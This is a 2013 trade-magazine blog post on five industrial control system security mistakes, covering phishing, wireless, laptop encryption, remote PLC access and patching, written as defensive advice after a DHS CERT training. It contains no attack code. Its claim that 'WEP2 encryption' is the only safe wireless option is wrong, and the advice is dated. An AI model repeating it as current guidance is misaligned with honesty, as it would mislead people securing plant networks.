5 industrial control system cyber security mistakes

From spear phishing to encryption errors, there are many ways to let bad guys into your networks.

04/15/2013


Recently, I attended ICS Cyber Security (301) Training at the U.S. DHS CERT facility in Idaho Falls, Id. The five-day event featured hands-on training in discovering who and what is on the network, identifying vulnerabilities, learning how those vulnerabilities may be exploited, and learning defensive and mitigation strategies for ICSs (industrial control systems). Here are five key takeaways from that training.

1. Spear phishing attacks

Do you know how most computer networks are compromised? By employees that can’t resist an email with a subject line: “Click here to get free gas for a year.” Literally, that is the subject line. This is called phishing and it's the most prevalent way that a hacker gets through a company’s initial network defenses. Phishing emails go to large volumes of addressees and use a generic offer, such as free gas or an error from a bank. Spear phishing is more specifically directed at a particular company or other smaller group of individuals using a more tailored offer. Either way, this technique uses a malicious email that effectively plants a tiny program, known to most people as a virus or malware but functionally different, that grants access to the victim’s computer from outside the network. The difference is that, instead of implanting a virus, the attacker uses this access to explore the network secretly. There are easy, generally available tools that can be used to find further weaknesses which allow additional access deeper into the network, and ultimately to the industrial control system.

2. Wi-Fi weaknesses

You may be enjoying the convenience of using Wi-Fi on your control network. However, if your wireless networking equipment was installed before 2006, it is likely other people can also enjoy using it to get access to your equipment! The only safe way to go wireless is with WEP2 encryption. This is standard on all new COTS (commercial off the shelf equipment) and is considered safe, at least for now.

3. Hard drive encryption

If you have a strong laptop password but choose not to encrypt your hard drive, if your laptop is stolen, the thief can have full access to your company’s network. This access is generally gained through Microsoft machines’ connectivity—the feature that allows you to move from office to office while still maintaining connection to your network. Connectivity works because Microsoft stores a “token” or “hash” on your computer that says “Hey, this is a trusted company laptop with a correct password.” Attackers can use your token or hash to spoof a system to think that another laptop is your trusted company laptop and then they can gain access to your network. The only way to prevent this is to encrypt your hard drive. This process is actually fairly simple, so ask your network administrator how to do this if you travel a lot with your laptop.

4. Remote access

Since many PLCs and other industrial controllers now have web browsers, many people like to log in from home to keep up with what’s happening at the plant. However, they don’t realize that a few extra steps are needed to make sure an attacker can’t also enjoy that convenience. Embedded web browsers in PLCs assume that they are for internal use only, so they have little or no security features. Did you know that there are systems that actually search for PLCs on the Internet? Check out shodanhq.com to see if your PLC has been found yet. Do you want a bored 15-year-old to shut off your cooling tower, or something more important? Don’t be tempted to add external access to your control network without the proper layered security, or you might be the next Internet hacking headline.

5. Software patching

There is no clear answer to the “to patch or not to patch” question. Many software companies recommend, or explicitly state, that systems should receive software updates and patches to prevent them from being exploited by known vulnerabilities. But what if a patch causes your HMI (human machine interface) to crash? What is worse, a possible exploit or an unplanned outage caused by a failed software update? To the technician who anticipates being the person receiving the blame when the system crashes because of the patch, that answer is clear. So what is a technician to do? The only solution is to know what vulnerabilities exist in your system. Maybe some extra care and protection are required for you HMI’s running Windows 2000. For example maybe you need an extra firewall. You might find that less attention is needed for new Windows 7 HMI computers when they are regularly updated by IT.

Security takes time and effort, and properly prioritizing your response can give you the best protection for the lowest cost. For more visit the ICS-CERT overview of cyber vulnerabilities.

This post was written by Bruce Billedeaux, PE. Bruce is a senior consultant at MAVERICK Technologies, a leading system integrator providing industrial automation, operational support, and control systems engineering services in the manufacturing and process industries. MAVERICK delivers expertise and consulting in a wide variety of areas including industrial automation controls, distributed control systems, manufacturing execution systems, operational strategy, and business process optimization. The company provides a full range of automation and controls services – ranging from PID controller tuning and HMI programming to serving as a main automation contractor. Additionally MAVERICK offers industrial and technical staffing services, placing on-site automation, instrumentation and controls engineers.



No comments
The Engineers' Choice Awards highlight some of the best new control, instrumentation and automation products as chosen by...
Each year, a panel of Control Engineering editors and industry expert judges select the System Integrator of the Year Award winners.
Control Engineering Leaders Under 40 identifies and gives recognition to young engineers who...
Learn more about methods used to ensure that the integration between the safety system and the process control...
Adding industrial toughness and reliability to Ethernet eGuide
Technological advances like multiple-in-multiple-out (MIMO) transmitting and receiving
Big plans for small nuclear reactors: Simpler, safer control designs; Smarter manufacturing; Industrial cloud; Mobile HMI; Controls convergence
Virtualization advice: 4 ways splitting servers can help manufacturing; Efficient motion controls; Fill the brain drain; Learn from the HART Plant of the Year
Two sides to process safety: Combining human and technical factors in your program; Preparing HMI graphics for migrations; Mechatronics and safety; Engineers' Choice Awards
The Ask Control Engineering blog covers all aspects of automation, including motors, drives, sensors, motion control, machine control, and embedded systems.
Join this ongoing discussion of machine guarding topics, including solutions assessments, regulatory compliance, gap analysis...
News and comments from Control Engineering process industries editor, Peter Welander.
IMS Research, recently acquired by IHS Inc., is a leading independent supplier of market research and consultancy to the global electronics industry.
This is a blog from the trenches – written by engineers who are implementing and upgrading control systems every day across every industry.
Anthony Baker is a fictitious aggregation of experts from Callisto Integration, providing manufacturing consulting and systems integration.
Integrator Guide

Integrator Guide

Search the online Automation Integrator Guide
 

Create New Listing

Visit the System Integrators page to view past winners of Control Engineering's System Integrator of the Year Award and learn how to enter the competition. You will also find more information on system integrators and Control System Integrators Association.

Case Study Database

Case Study Database

Get more exposure for your case study by uploading it to the Control Engineering case study database, where end-users can identify relevant solutions and explore what the experts are doing to effectively implement a variety of technology and productivity related projects.

These case studies provide examples of how knowledgeable solution providers have used technology, processes and people to create effective and successful implementations in real-world situations. Case studies can be completed by filling out a simple online form where you can outline the project title, abstract, and full story in 1500 words or less; upload photos, videos and a logo.

Click here to visit the Case Study Database and upload your case study.